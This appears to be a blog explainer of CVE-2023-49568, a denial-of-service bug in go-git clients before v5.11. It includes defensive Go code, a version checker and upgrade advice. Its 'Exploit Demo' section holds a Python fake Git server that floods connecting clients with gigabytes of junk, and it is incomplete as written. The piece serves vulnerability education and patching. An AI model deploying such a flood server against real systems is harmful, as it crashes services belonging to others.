CVE-2023-49568 - DoS in go-git – All You Need to Know (with Code and Exploit Example)
In December 2023, a denial of service (DoS) vulnerability was officially published under the identifier CVE-2023-49568. This bug affects versions of go-git before v5.11. In this easy-to-understand read, I’ll break down what this issue is, show a code snippet, outline a simple exploitation scenario, and help you avoid getting hit yourself.
What Is go-git?
Before diving into the vulnerability, it helps to understand what go-git is. go-git is a popular pure Go implementation of Git. Many Go applications use it to read, write, and manage Git repositories programmatically without requiring the official git command line client.
What Is CVE-2023-49568?
In short, CVE-2023-49568 describes a weakness in go-git versions earlier than 5.11. If a go-git client talks to a *malicious Git server*, it’s possible for that server to send back unexpected, “special” responses that tie up resources on the client side. This means that an attacker could intentionally crash or freeze applications built with go-git simply by getting them to fetch from their hostile server.
What’s vulnerable?
- All go-git versions *before* 5.11
- Only when interacting with “real” filesystems (memory-only fs implementations are not affected)
- Only if your app is using go-git as a client
What’s not vulnerable?
- go-git v5.11 and later
- Applications that only use go-git’s in-memory filesystem
- The standard git command line client, which is a separate implementation
Why Does This Happen?
The root of the bug, simplified, is that go-git’s server response parsing logic doesn’t protect itself if the server sends a massive or malformed payload. Specifically, during large clone/fetch operations, the client may try to read a huge amount of data into memory or write gigantic objects to disk, leading to resource exhaustion.
If the attacker controls the server, it can intentionally send gigabytes of nonsense, causing the client to hang or even crash the machine.
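The defensive principle behind this class of bug is that the client, not the server, must decide how much data it is willing to accept. The following Go program is an added illustration written for this post, not go-git’s code and not the actual v5.11 patch: it reads git’s pkt-line framing, rejects any length header above the protocol maximum of 65520 bytes, and aborts once the server has sent more than an agreed byte budget. The sample streams (a benign handshake, a header claiming an oversized line, and a flood of valid lines) are constructed inline.

```go
package main

import (
	"bytes"
	"encoding/hex"
	"errors"
	"fmt"
	"io"
)

// maxPktLine is git's documented upper bound for one pkt-line
// (65520 bytes, counting the 4-byte hex length prefix).
const maxPktLine = 65520

var (
	ErrMalformedLength = errors.New("pkt-line length is not 4 hex digits or is below 4")
	ErrOversizedPkt    = errors.New("pkt-line length exceeds the 65520-byte protocol maximum")
	ErrBudgetExceeded  = errors.New("server response exceeds the caller's byte budget")
)

// parsePktLen validates the 4-byte hex length prefix; 0 means flush-pkt ("0000").
func parsePktLen(hdr [4]byte) (int, error) {
	var raw [2]byte
	if _, err := hex.Decode(raw[:], hdr[:]); err != nil {
		return 0, ErrMalformedLength
	}
	n := int(raw[0])<<8 | int(raw[1])
	switch {
	case n == 0:
		return 0, nil
	case n < 4:
		return 0, ErrMalformedLength
	case n > maxPktLine:
		return 0, ErrOversizedPkt
	}
	return n, nil
}

// budgetOr maps an EOF that coincides with an exhausted limit to ErrBudgetExceeded
// (a stream that stops exactly at the budget without a flush-pkt is reported the
// same way: the reader fails closed rather than guessing).
func budgetOr(err error, lr *io.LimitedReader) error {
	if lr.N == 0 && (err == io.EOF || err == io.ErrUnexpectedEOF) {
		return ErrBudgetExceeded
	}
	return err
}

// readPktLines reads pkt-line payloads until a flush-pkt or a clean EOF and
// refuses to consume more than budget bytes in total: the client, not the
// server, decides how much it is willing to buffer.
func readPktLines(r io.Reader, budget int64) ([][]byte, error) {
	lr := &io.LimitedReader{R: r, N: budget}
	var lines [][]byte
	for {
		var hdr [4]byte
		n, err := io.ReadFull(lr, hdr[:])
		if n == 0 && err == io.EOF && lr.N > 0 {
			return lines, nil // clean end of stream
		}
		if err != nil {
			return lines, budgetOr(err, lr) // truncated header or budget hit
		}
		plen, err := parsePktLen(hdr)
		if err != nil {
			return lines, err
		}
		if plen == 0 {
			return lines, nil // flush-pkt terminates the section
		}
		payload := make([]byte, plen-4) // bounded: at most maxPktLine-4 bytes
		if _, err := io.ReadFull(lr, payload); err != nil {
			return lines, budgetOr(err, lr)
		}
		lines = append(lines, payload)
	}
}

// encodePkt frames s as a pkt-line; used only to build the constructed samples.
func encodePkt(s string) []byte {
	return []byte(fmt.Sprintf("%04x%s", len(s)+4, s))
}

// Constructed sample streams, not captured from any real server.
func benignStream() []byte {
	return append(append(encodePkt("version 2\n"), encodePkt("ls-refs\n")...), "0000"...)
}
func oversizedStream() []byte { return []byte("ffffPACK") } // header claims 65535 bytes
func floodStream(count, size int) []byte {
	return bytes.Repeat(encodePkt(string(bytes.Repeat([]byte("A"), size))), count)
}

func main() {
	lines, err := readPktLines(bytes.NewReader(benignStream()), 1<<20)
	fmt.Printf("benign: %d lines, err=%v\n", len(lines), err)
	lines, err = readPktLines(bytes.NewReader(floodStream(64, 1000)), 8192)
	fmt.Printf("flood: stopped after %d lines, err=%v\n", len(lines), err)
}
```

With the flood stream and an 8192-byte budget the reader returns after eight complete lines with ErrBudgetExceeded instead of buffering everything the peer cares to send; a vulnerable client has no such stopping point.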
Code Snippet – Vulnerable Usage
Here’s some real-world Go code, simplified, that would be vulnerable if it’s running go-git before 5.11:
```go
package main

import (
	"log"

	"github.com/go-git/go-git/v5"
)

func main() {
	// WARNING! Cloning from an attacker-controlled URL below is dangerous
	_, err := git.PlainClone("/tmp/some-repo", false, &git.CloneOptions{
		URL:      "https://malicious.example.com/fake-repo.git", // Attacker's Git server
		Progress: nil,
	})
	if err != nil {
		log.Fatalf("Failed to clone: %v", err)
	}
}
```
If the attacker runs a custom Git server and feeds huge blobs, this code will quickly eat up RAM and CPU, and either get killed by the OS or hang indefinitely.
Exploitation Scenario
1. Attacker launches a fake Git server: builds a server (could be go-git based, or just a netcat session) that sends useless, oversized or infinite objects as a “repo”.
2. Victim app clones or fetches: the vulnerable go-git app connects to that server—maybe it’s tricked with a malicious URL, supply chain attack, or “dependency confusion”.
3. Resource exhaustion happens: the victim’s go-git code tries to buffer or write out the server’s huge data, blowing out RAM/disk, and possibly killing the process.
Exploit Demo: Custom Fake "billion-byte" Response
```python
# Run this Python script as a fake git server
import socket

payload = b"000000cPACK" + b"A" * 1_500_000_000  # Make a fake huge Git packfile
server = socket.socket()
server.bind(("...", 9418))  # Standard Git port
server.listen(1)
print("Now listening. Connect from vulnerable go-git code...")
client, addr = server.accept()
print("Connection from", addr)
while True:
    # In a real PoC, first exchange some Git server handshake data
    client.sendall(payload)  # BAM—send gigabytes!
```
If you connect the Go code above (using go-git < v5.11) to git://<attacker-ip>, the process will very likely run out of memory or crash.
How to Protect Yourself
Upgrade to go-git v5.11 or later:
```sh
go get github.com/go-git/go-git/v5@latest
```
Use in-memory filesystems if possible:
If you don’t need to persist files, using go-git’s memory backend (memfs) mitigates the risk even in older versions.
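To check whether a module is still on an affected release, here is an added Go helper written for this post (not part of go-git, and not from the advisory): it reads a go.mod file or the output of `go list -m all`, finds the pinned `github.com/go-git/go-git/v5` version, and compares it against v5.11.0, treating a pre-release or pseudo-version of 5.11.0 as older than the release. The go.mod text at the bottom is constructed, not taken from a real project. Note that a go.mod `require` line is only the minimum version Go will select; run the helper over `go list -m all` output to check the version actually built.

```go
package main

import (
	"bufio"
	"fmt"
	"strconv"
	"strings"
)

// goGitModule is the module path from the page's go get command; v5.11.0 is
// the first release the page says is not affected.
const goGitModule = "github.com/go-git/go-git/v5"
var fixedVersion = version{major: 5, minor: 11, patch: 0}

type version struct {
	major, minor, patch int
	prerelease          bool // has a "-..." suffix (pre-release or pseudo-version)
}

// parseVersion handles the "vMAJOR.MINOR.PATCH[-suffix]" form that go.mod
// and `go list -m` print.
func parseVersion(s string) (version, error) {
	var v version
	core := strings.TrimPrefix(s, "v")
	if i := strings.IndexByte(core, '-'); i >= 0 {
		v.prerelease = true
		core = core[:i]
	}
	parts := strings.Split(core, ".")
	if len(parts) != 3 {
		return v, fmt.Errorf("unsupported version %q", s)
	}
	var nums [3]int
	for i, p := range parts {
		n, err := strconv.Atoi(p)
		if err != nil {
			return v, fmt.Errorf("unsupported version %q", s)
		}
		nums[i] = n
	}
	v.major, v.minor, v.patch = nums[0], nums[1], nums[2]
	return v, nil
}

// less orders versions numerically; a pre-release or pseudo-version of X.Y.Z sorts before X.Y.Z.
func (v version) less(o version) bool {
	if v.major != o.major {
		return v.major < o.major
	}
	if v.minor != o.minor {
		return v.minor < o.minor
	}
	if v.patch != o.patch {
		return v.patch < o.patch
	}
	return v.prerelease && !o.prerelease
}

// goGitVersion finds the go-git v5 requirement in go.mod text or in
// `go list -m all` output (both use "<module path> <version>" lines).
func goGitVersion(text string) (string, bool) {
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		line := strings.TrimPrefix(strings.TrimSpace(sc.Text()), "require ")
		if i := strings.Index(line, "//"); i >= 0 {
			line = line[:i] // drop "// indirect" and other comments
		}
		if f := strings.Fields(line); len(f) >= 2 && f[0] == goGitModule {
			return f[1], true
		}
	}
	return "", false
}

// isVulnerable reports whether text pins a go-git v5 version before v5.11.0;
// found is false when go-git v5 does not appear at all.
func isVulnerable(text string) (vulnerable, found bool, err error) {
	raw, ok := goGitVersion(text)
	if !ok {
		return false, false, nil
	}
	v, err := parseVersion(raw)
	if err != nil {
		return false, true, err
	}
	return v.less(fixedVersion), true, nil
}

// sampleGoMod is a constructed go.mod, not taken from any real project.
const sampleGoMod = `module example.com/app
require (
	github.com/go-git/go-billy/v5 v5.5.0
	github.com/go-git/go-git/v5 v5.10.1 // indirect
)
`
func main() {
	vuln, found, err := isVulnerable(sampleGoMod)
	fmt.Printf("go-git found=%v vulnerable=%v err=%v\n", found, vuln, err)
}
```

The comparison is deliberately stricter than a plain string check: a pseudo-version such as `v5.11.0-0.<timestamp>-<hash>` names a commit *before* the v5.11.0 tag and is reported as affected, which a naive "starts with v5.11" test would miss.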
References
- Official CVE bulletin
- go-git security advisory
- go-git release notes for v5.11
Key points:
- Only impacts “real” file operations (not full in-memory use)
- Upgrade go-git to 5.11+ right away
- Only the Go implementation is affected—not the standard git CLI
Stay safe, patch up, and always treat remote servers with suspicion!
Timeline
Published on: 01/12/2024 11:15:12 UTC
Last modified on: 01/22/2024 17:57:41 UTC